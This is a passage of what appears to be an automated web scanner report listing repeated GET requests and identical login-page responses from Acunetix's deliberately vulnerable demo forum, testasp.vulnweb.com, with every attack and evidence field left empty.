width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
